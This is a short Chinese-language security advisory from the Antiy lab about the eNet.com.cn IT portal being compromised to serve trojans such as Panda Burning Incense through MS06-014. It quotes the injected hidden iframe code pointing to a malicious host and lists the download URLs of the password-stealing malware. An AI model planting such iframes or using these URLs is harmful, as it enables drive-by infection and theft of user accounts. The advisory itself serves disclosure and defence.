|
1月11日,安天实验室反病毒监测网发现,硅谷动力网站(www.eNet.com.cn)被黑客植入病毒,用户如果访问该网站,将会被病毒感染,由于该网站是有一定影响力的IT门户网站,日访问量达1800万次,所挂木马,又包含现在较为流行的熊猫烧香以及黄金甲等。因此会造成较大的危害。
攻击者利用MS06-014漏洞来传播木马,该网站的各页面上,被添加了如下内容,<iframe src=http://www.krvxx.com/worm.htm width=0 height=0></iframe>,在恶意网站http://www.krvxx.com/worm.htm中包含<iframe src=muma.htm width=0 height=0></iframe>。试图通过多次页面跳转来躲避查杀。
当用户点击网页后,系统就会自动从恶意网站上下载并运行多个恶意程序。首先下载http://www.krvxx.com/worm.exe(Trojan-Dropper.Win32.Delf.or)到本地系统,衍生到系统的临时目录,改名为svch0st.exe,然后复制副本到%system%\下,并改名为spoclsv.exe,该木马还会下载如下木马到本地系统:
http://58.215.xx.164/down/wormcn.txt
http://58.215.xx.164/down/cq.exe
http://58.215.xx.164/down/ly.exe
http://58.215.xx.164/down/my.exe
http://58.215.xx.164/down/rx.exe
http://58.215.xx.164/down/wl.exe
http://58.215.xx.164/down/wow.exe
http://58.215.xx.164/down/zt.exe
http://www.krvxx.com/down/dj.exe
http://www.krvxx.com/down/kr/itembay.exe
所下木马,会偷取用户的网游帐户及其他敏感信息。广大用户应该提高警惕,不要访问带毒网站,并及时更新您的木马防线,保护您的上网安全。
|
内容:
病毒上报信箱: